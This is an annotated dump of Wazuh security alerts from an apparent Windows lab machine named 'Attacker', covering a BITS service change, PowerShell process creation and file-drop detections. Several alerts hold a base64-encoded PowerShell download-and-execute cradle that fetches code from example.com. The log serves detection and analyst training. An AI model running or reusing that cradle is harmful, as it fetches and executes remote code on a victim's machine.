This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Service startup type was changed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 61104 Numeric ID of the detection rule that fired.
rule.info: This does not appear to be logged on Windows 2000 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.firedtimes: 12 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_system', 'policy_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6'] PCI DSS mapping – card‑holder data rules.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6'] NIST 800‑53 mapping – US Fed controls.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535392.2856547 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {555908d1-a6d7-4695-8e1e-26931d2012f4} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 7040 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8080000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:29.3906500Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 3076 Incremental log record number – handy for timeline order.
data.win.system.processID: 772 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 10380 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "The start type of the Background Intelligent Transfer Service service was changed from demand start to auto start." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param1: Background Intelligent Transfer Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param2: demand start No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param3: auto start No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param4: BITS No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 130 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535393.2858360 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:31.2111559Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350830 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:56:30.128
ProcessGuid: {94294ddc-c19e-680a-fd0c-000000000e00}
ProcessId: 9136
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c19b-680a-fa0c-000000000e00}
ParentProcessId: 13544
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:30.128 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c19e-680a-fd0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9136 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-c19b-680a-fa0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 13544 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 134 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535393.2866427 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:31.4169608Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350839 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:56:31.361
ProcessGuid: {94294ddc-c19e-680a-fd0c-000000000e00}
ProcessId: 9136
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_kiqaikxm.v25.ps1
CreationUtcTime: 2025-04-24 22:56:31.361
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:31.361 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c19e-680a-fd0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9136 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_kiqaikxm.v25.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:56:31.361 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 131 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535396.2869192 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:33.6258405Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350866 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:56:32.452
ProcessGuid: {94294ddc-c1a0-680a-ff0c-000000000e00}
ProcessId: 10052
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c19e-680a-fd0c-000000000e00}
ParentProcessId: 9136
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:32.452 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c1a0-680a-ff0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10052 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-c19e-680a-fd0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 9136 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 135 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535396.2877259 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
